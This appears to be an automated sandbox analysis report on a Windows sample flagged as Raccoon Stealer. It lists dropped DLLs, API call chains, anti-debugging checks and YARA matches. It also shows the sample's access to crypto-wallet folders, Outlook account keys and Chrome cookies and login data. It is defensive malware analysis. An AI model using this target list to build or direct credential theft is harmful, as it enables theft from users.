Code function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004206DD

Source: C:\Users\user\Desktop\8aAG42oIjb.exe TID: 4780	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6264	Thread sleep count: 75 > 30			Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Registry key enumerated: More than 152 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_00437819

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_0043EFDD

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW}

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0045C559 IsDebuggerPresent,OutputDebugStringW,

0_2_0045C559

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

0_2_0042A2F9

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,

0_2_00433882

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h]	0_2_0045A03D
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h]	0_2_0045A081
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h]	0_2_0045A0B2
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00446C01 mov eax, dword ptr fs:[00000030h]	0_2_00446C01

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00446625
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00440B62 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00440B62
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00440CC5 SetUnhandledExceptionFilter,	0_2_00440CC5
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00440EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00440EDC

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	0_2_0042C383
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	0_2_00437819
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00462391
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: EnumSystemLocalesW,	0_2_00458577
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,	0_2_0046258C
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: EnumSystemLocalesW,	0_2_0046267E
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: EnumSystemLocalesW,	0_2_00462633
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: EnumSystemLocalesW,	0_2_00462719
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_004627A4
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,	0_2_004629F7
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00462B1D
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,	0_2_00458BA4
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetLocaleInfoW,	0_2_00462C23
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00462CF2

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_00440985 cpuid

0_2_00440985

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0043E03E

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

0_2_004371FA

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

0_2_0042A2F9

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,

0_2_0042C383

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8aAG42oIjb.exe PID: 3124, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;\|
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;\|
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: Jaxx;26;Jaxx;;cache*
Source: 8aAG42oIjb.exe, 00000000.00000002.674214510.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: ;26;exodus
Source: 8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8aAG42oIjb.exe PID: 3124, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection11	Obfuscated Files or Information3	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery36	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
8aAG42oIjb.exe	33%	Virustotal		Browse
8aAG42oIjb.exe	57%	ReversingLabs	Win32.Trojan.Sabsik
8aAG42oIjb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
